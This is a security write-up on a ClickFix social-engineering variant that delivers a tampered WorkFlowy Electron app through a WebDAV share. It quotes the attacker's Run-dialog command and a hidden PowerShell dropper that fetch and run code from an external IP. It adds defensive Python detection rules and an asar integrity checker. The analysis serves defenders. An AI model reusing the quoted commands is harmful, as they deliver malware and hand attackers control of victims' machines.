Unveiling a New ClickFix Variant: Cyberattackers Exploit Network Drives and Electron Apps
Security researchers have identified a new variant of the ClickFix social engineering technique. Rather than having the victim download a script directly, it tricks the user into running a command that maps a remote WebDAV share as a network drive and launches a tampered Electron-based application, giving the attacker remote access to and control over the system.
Understanding ClickFix and Its Evolution
ClickFix is a deceptive tactic where attackers trick users into running harmful commands under the guise of resolving non-existent issues or completing routine tasks. Traditionally, this involved prompting users to execute commands via the Windows Run dialog, leading to the download and execution of malicious scripts. The latest iteration of ClickFix introduces more complex techniques, enhancing the attack’s effectiveness and evasion capabilities.
Detailed Attack Flow
The attack initiates when a user visits a compromised or malicious website designed to resemble a legitimate CAPTCHA verification page. The site instructs the user to press the Win + R keyboard shortcut to open the Run dialog, paste a provided command, and execute it by pressing Enter. The command executed is as follows:
```
cmd.exe /c net use Z: https://94.156.170[.]255/webdav /persistent:no && Z:\update.cmd & net use Z: /delete
```
This command sequence performs the following actions:
1. Network Drive Mapping: `net use` maps drive Z: to a WebDAV share on an external server at `https://94.156.170[.]255/webdav` (a URL target, unlike the UNC paths used for ordinary file-server mappings). The `/persistent:no` flag makes the mapping temporary, so it does not survive a reboot.
2. Execution of Malicious Script: Once the network drive is mapped, the command executes a batch script named `update.cmd` located on the mapped drive.
3. Cleanup: After executing the script, the network drive mapping is removed using `net use Z: /delete` to minimize traces of the attack.
Analysis of the Malicious Script
The `update.cmd` script contains the following instructions:
```
start /min powershell -WindowStyle Hidden -Command Invoke-WebRequest 'https://94.156.170[.]255/flowy.zip' -OutFile $env:TEMP\dl.zip;
Expand-Archive $env:TEMP\dl.zip -DestinationPath $env:LOCALAPPDATA\MyApp\ -Force;
Start-Process $env:LOCALAPPDATA\MyApp\WorkFlowy.exe
```
This script performs the following operations:
1. Download of Malicious Archive: Initiates a hidden PowerShell process that downloads a ZIP archive named `flowy.zip` from the external server `https://94.156.170[.]255/flowy.zip` and saves it to the system’s temporary directory.
2. Extraction and Deployment: Extracts the contents of the ZIP archive into the directory `%LOCALAPPDATA%\MyApp\`.
3. Execution of Compromised Application: Launches an application named `WorkFlowy.exe` from the extracted files.
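As an added example that is not part of the original report, the following Python detection logic runs over constructed process-creation events (shaped like Sysmon Event ID 1 fields) and flags the two stages described above: a `net use` mapping whose target is an HTTP(S) URL, execution of anything from that drive letter shortly afterwards, and a hidden PowerShell instance that downloads, extracts and launches in a single command line. The event tuples, timestamps and the 300-second correlation window are assumptions.

```python
import re

# Constructed sample process-creation events (not real telemetry), modelled on Sysmon Event ID 1 fields:
# (timestamp in seconds, parent image, image, command line). The IP is kept defanged as in the report.
SAMPLE_EVENTS = [
    (100, r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c net use Z: https://94.156.170[.]255/webdav /persistent:no && Z:\update.cmd & net use Z: /delete"),
    (101, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
     r"net use Z: https://94.156.170[.]255/webdav /persistent:no"),
    (103, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\cmd.exe",
     r'C:\Windows\system32\cmd.exe /c ""Z:\update.cmd" "'),
    (104, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -WindowStyle Hidden -Command Invoke-WebRequest 'https://94.156.170[.]255/flowy.zip' "
     r"-OutFile $env:TEMP\dl.zip; Expand-Archive $env:TEMP\dl.zip -DestinationPath $env:LOCALAPPDATA\MyApp\ -Force; "
     r"Start-Process $env:LOCALAPPDATA\MyApp\WorkFlowy.exe"),
    (500, r"C:\Windows\explorer.exe", r"C:\Windows\System32\net.exe",
     r"net use P: \\fileserver\share /persistent:yes"),  # ordinary SMB mapping, must not alert
]

# `net use <letter>: http(s)://...` mounts a WebDAV share; legitimate mappings use UNC paths, not URLs.
WEBDAV_MAP = re.compile(r"net\s+use\s+([A-Za-z]):\s+https?://", re.I)
# Download, extract and launch chained in one hidden PowerShell command line.
HIDDEN_PS_DROPPER = re.compile(r"-windowstyle\s+hidden.*invoke-webrequest.*(expand-archive|start-process)", re.I)
DRIVE_WINDOW_SECONDS = 300  # assumed correlation window between mapping and execution


def detect(events):
    """Return (rule, timestamp, command_line) alerts for the ClickFix WebDAV pattern."""
    alerts = []
    mapped = {}  # drive letter -> time it was mapped to an HTTP(S) target
    for ts, _parent, image, cmdline in events:
        mapping = WEBDAV_MAP.search(cmdline)
        if mapping:
            mapped[mapping.group(1).upper()] = ts
            alerts.append(("webdav_drive_map", ts, cmdline))
        # Anything referencing a recently WebDAV-mapped letter runs straight off the remote server.
        # The mapping command itself names the letter too, so it is excluded here.
        elif any(ts - when <= DRIVE_WINDOW_SECONDS and re.search(rf"\b{letter}:\\", cmdline, re.I)
                 for letter, when in mapped.items()):
            alerts.append(("exec_from_webdav_drive", ts, cmdline))
        if "powershell" in image.lower() and HIDDEN_PS_DROPPER.search(cmdline):
            alerts.append(("hidden_powershell_dropper", ts, cmdline))
    return alerts


if __name__ == "__main__":
    for rule, ts, cmdline in detect(SAMPLE_EVENTS):
        print(f"[{ts}] {rule}: {cmdline[:80]}")
```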
Exploitation of Electron Applications
The `flowy.zip` archive contains a modified build of the WorkFlowy desktop application (version 1.4.1050), an Electron-based application signed by FunRoutine Inc. Electron applications are built with web technologies (JavaScript, HTML and CSS) and package that code into `.asar` archives, which the Electron executable loads at start-up.
In this attack, the `.asar` archive within the WorkFlowy application has been tampered with to include malicious code. When the user launches the compromised WorkFlowy application, the embedded malicious code executes, establishing a command-and-control (C2) beacon and acting as a dropper for additional malware payloads.
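The Authenticode signature on the executable covers that PE file, not the separate `app.asar` it loads from its resources directory, so a valid signature on `WorkFlowy.exe` does not prove the bundled JavaScript is pristine; comparing per-entry hashes of the archive against a known-good build does. The following Python example is added here and is not from the original report or the WorkFlowy project: it implements the asar header layout (two Chromium pickles, a 4-byte size followed by a length-prefixed JSON header padded to 4 bytes, then the file data) and reports entries that changed or were added, using small archives constructed inline.

```python
import hashlib
import json
import struct


def build_asar(files):
    """Pack {name: bytes} into a minimal asar blob (flat layout, no subdirectories) for the demo."""
    header, data = {"files": {}}, b""
    for name, content in files.items():
        header["files"][name] = {"size": len(content), "offset": str(len(data))}  # offset is a string in asar
        data += content
    header_json = json.dumps(header).encode()
    padded = header_json + b"\0" * (-len(header_json) % 4)     # pickle pads payloads to 4 bytes
    header_pickle = struct.pack("<II", 4 + len(padded), len(header_json)) + padded
    return struct.pack("<II", 4, len(header_pickle)) + header_pickle + data


def asar_entry_hashes(blob):
    """Return {path: sha256} for every packed file in an asar blob, descending into directories."""
    _, header_size = struct.unpack_from("<II", blob, 0)        # pickle 1: size of the header pickle
    (json_len,) = struct.unpack_from("<I", blob, 12)           # pickle 2: length-prefixed JSON string
    header = json.loads(blob[16:16 + json_len])
    data_start = 8 + header_size                               # file contents follow the header pickle
    hashes = {}

    def walk(node, prefix):
        for name, entry in node["files"].items():
            if "files" in entry:
                walk(entry, prefix + name + "/")
            elif not entry.get("unpacked"):                    # unpacked entries live outside the archive
                start = data_start + int(entry["offset"])
                hashes[prefix + name] = hashlib.sha256(blob[start:start + entry["size"]]).hexdigest()

    walk(header, "")
    return hashes


def tampered_entries(baseline, observed):
    """Paths whose hash differs from the known-good manifest, including added or removed files."""
    return sorted(p for p in set(baseline) | set(observed) if baseline.get(p) != observed.get(p))


# Constructed sample builds: a pristine app and a copy with an injected require() and an extra module.
GOOD_APP = {"package.json": b'{"main":"main.js"}', "main.js": b"require('./app');\n"}
BAD_APP = {**GOOD_APP, "main.js": b"require('./app');\nrequire('./injected');\n", "injected.js": b"/* beacon */"}
BASELINE = asar_entry_hashes(build_asar(GOOD_APP))              # manifest taken from the known-good build

if __name__ == "__main__":
    print(tampered_entries(BASELINE, asar_entry_hashes(build_asar(BAD_APP))))  # ['injected.js', 'main.js']
```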
Implications and Evasion Techniques
This new ClickFix variant demonstrates a high level of operational sophistication:
– Bypassing Security Measures: The early stages use only built-in utilities (`net use`, `cmd.exe` and PowerShell), so security products that rely on signatures for known-malicious binaries have nothing to match until the final payload runs.
– Utilizing Trusted Applications: The use of a legitimate, signed Electron application reduces suspicion and increases the likelihood of successful execution.
– In-Memory Execution: Executing malicious code within the memory space of a trusted application minimizes the presence of malicious files on disk, further evading detection.
Recommendations for Mitigation
To protect against such sophisticated attacks, users and organizations should implement the following measures:
1. User Education: Train users to recognize and avoid social engineering tactics, such as unexpected prompts to execute commands or open files from untrusted sources.
2. Restrict Execution Policies: Implement strict execution policies that prevent unauthorized scripts and commands from running, especially those initiated through the Run dialog or command prompt.
3. Monitor Network Activity: Regularly monitor network and endpoint activity for unusual patterns, such as `net use` mappings whose target is an HTTP(S) URL (WebDAV) rather than an internal file server, processes launched from a freshly mapped drive letter, or connections to unfamiliar external servers.
4. Application Whitelisting: Utilize application whitelisting to control which applications are allowed to run, thereby preventing the execution of unauthorized or modified applications.
5. Regular Software Updates: Ensure that all software, including security solutions, is up to date to benefit from the latest security patches and threat intelligence.
Conclusion
The emergence of this new ClickFix variant underscores the evolving nature of cyber threats and the importance of continuous vigilance. By understanding the tactics employed in such attacks and implementing robust security measures, individuals and organizations can better defend against these sophisticated social engineering schemes.